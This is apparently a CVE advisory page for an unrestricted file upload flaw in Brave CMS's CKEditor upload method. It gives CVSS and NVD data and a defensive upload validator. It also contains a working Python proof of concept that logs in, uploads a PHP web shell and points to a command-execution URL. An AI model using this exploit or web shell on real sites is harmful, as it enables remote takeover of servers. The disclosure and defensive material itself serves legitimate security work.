Security Vulnerability Report
CVE-2026-35164 CVSS 8.8 HIGH

Published: 2026-04-06 18:16:43
Last Modified: 2026-04-14 15:51:16

Description

Brave CMS is an open-source CMS. Prior to 2.0.6, an unrestricted file upload vulnerability exists in the CKEditor upload functionality. It is found in app/Http/Controllers/Dashboard/CkEditorController.php within the ckupload method. The method fails to validate uploaded file types and relies entirely on user input. This allows an authenticated user to upload executable PHP scripts and gain Remote Code Execution. This vulnerability is fixed in 2.0.6.
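As an added example (not code from Brave CMS or from the advisory), this is the kind of server-side check the description says the ckupload method lacks: the file type is decided from an allowlist and from the file's own content, not from the user-supplied name or Content-Type, and the stored name is generated on the server. The function names and the allowlist are assumptions for illustration.

```python
import os
import secrets

# Allowlisted extensions for a CKEditor image upload, mapped to the magic
# bytes the content must start with. Everything else (including .php) is
# rejected, so the check does not depend on the user-supplied name or MIME.
ALLOWED_TYPES = {
    "png":  [b"\x89PNG\r\n\x1a\n"],
    "jpg":  [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif":  [b"GIF87a", b"GIF89a"],
}

class UploadRejected(ValueError):
    """Raised when an upload fails validation."""

def validate_upload(user_filename: str, content: bytes) -> str:
    """Validate an upload and return a server-generated storage name.

    The client's filename is consulted only for its final extension; it is
    never used as the stored name, so 'shell.php', 'shell.php.png' or a
    path-traversal name cannot influence what is written to disk.
    """
    if "\x00" in user_filename:
        raise UploadRejected("null byte in filename")
    _, ext = os.path.splitext(os.path.basename(user_filename))
    ext = ext.lstrip(".").lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension not allowed: {ext or '(none)'}")
    # The declared Content-Type header is attacker-controlled, so the
    # content itself is checked against the magic bytes for that extension.
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected(f"content does not look like a .{ext} file")
    # Random server-side name: no user input reaches the filesystem.
    return f"{secrets.token_hex(16)}.{ext}"

def is_accepted(user_filename: str, content: bytes) -> bool:
    """True if validate_upload() would accept the file, False otherwise."""
    try:
        validate_upload(user_filename, content)
        return True
    except UploadRejected:
        return False
```

Pair this with an upload directory where the web server has script execution disabled: the validator limits what gets stored, and the directory setting keeps anything that still slips through (for example an image with embedded script text) from being executed as PHP.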

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ajax30:bravecms:*:*:*:*:*:*:*:* - VULNERABLE
Brave CMS < 2.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_url = "http://target.com/dashboard/ckupload"  # Vulnerable endpoint
shell_name = "exploit.php"

# Attacker's credentials (required as PR:L)
username = "attacker"
password = "password"
login_url = "http://target.com/login"

# PHP payload to execute system commands
php_payload = "<?php system($_GET['cmd']); ?>"

def exploit():
    session = requests.Session()

    # Step 1: Authenticate to the application
    print(f"[*] Logging in as {username}...")
    login_data = {
        "username": username,
        "password": password
    }
    # Adjust login POST data based on actual form fields
    session.post(login_url, data=login_data)

    # Step 2: Upload the malicious file
    print(f"[*] Uploading {shell_name}...")
    files = {
        'upload': (shell_name, php_payload, 'application/octet-stream')
    }
    # The parameter name 'upload' might vary, check the form data
    response = session.post(target_url, files=files)

    if response.status_code == 200:
        print("[+] Upload successful!")
        print(f"[+] Access your shell at: http://target.com/uploads/{shell_name}?cmd=whoami")
    else:
        print("[-] Upload failed.")
        print(response.text)

if __name__ == "__main__":
    exploit()
```

References

https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-2j4q-6p52-4rhw (Exploit, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-35164", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:42.900", "lastModified": "2026-04-14T15:51:15.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Brave CMS is an open-source CMS. Prior to 2.0.6, an unrestricted file upload vulnerability exists in the CKEditor upload functionality. It is found in app/Http/Controllers/Dashboard/CkEditorController.php within the ckupload method. The method fails to validate uploaded file types and relies entirely on user input. This allows an authenticated user to upload executable PHP scripts and gain Remote Code Execution. This vulnerability is fixed in 2.0.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ajax30:bravecms:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.0.6", "matchCriteriaId": "68058898-316C-481E-A190-0E50C51A015D"}]}]}], "references": [{"url": "https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-2j4q-6p52-4rhw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-2j4q-6p52-4rhw", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
```